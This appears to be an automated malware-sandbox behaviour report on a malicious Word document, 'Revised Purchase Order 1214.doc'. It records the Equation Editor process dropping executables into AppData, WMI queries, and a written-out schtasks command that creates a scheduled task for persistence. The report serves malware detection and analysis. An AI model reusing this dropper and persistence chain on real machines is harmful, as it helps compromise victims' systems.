Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_0033AB18	4_2_0033AB18
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_00332D78	4_2_00332D78
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_00330EA8	4_2_00330EA8
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_00334837	4_2_00334837
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_00334848	4_2_00334848
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_00334A98	4_2_00334A98
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 4_2_0033AB08	4_2_0033AB08
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00402296	7_2_00402296
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00365338	7_2_00365338
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00366350	7_2_00366350
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00365680	7_2_00365680
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00362091	7_2_00362091
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A47CA8	7_2_00A47CA8
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A4B03B	7_2_00A4B03B
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A4DBB8	7_2_00A4DBB8
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A461E8	7_2_00A461E8
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A40B08	7_2_00A40B08
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A4B620	7_2_00A4B620
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A42180	7_2_00A42180
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Code function: 7_2_00A44700	7_2_00A44700

Source: TrC86HH4pxVZ49N[1].exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: pridingnsjhfhdjs.exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: DsVdJeRPpef.exe.4.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: TrC86HH4pxVZ49N[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: pridingnsjhfhdjs.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: DsVdJeRPpef.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@8/15@9/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$vised Purchase Order 1214.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Mutant created: \Sessions\1\BaseNamedObjects\uslNAKA

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD519.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ........................................(.P.....0.......h...............#u................................................................#.....

Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Revised Purchase Order 1214.doc	Virustotal: Detection: 45%
Source: Revised Purchase Order 1214.doc	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Code function: 4_2_0033981B push cs; retf

4_2_0033981C

Source: initial sample	Static PE information: section name: .text entropy: 7.69951129181
Source: initial sample	Static PE information: section name: .text entropy: 7.69951129181
Source: initial sample	Static PE information: section name: .text entropy: 7.69951129181

Persistence and Installation Behavior:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	File created: C:\Users\user\AppData\Roaming\DsVdJeRPpef.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
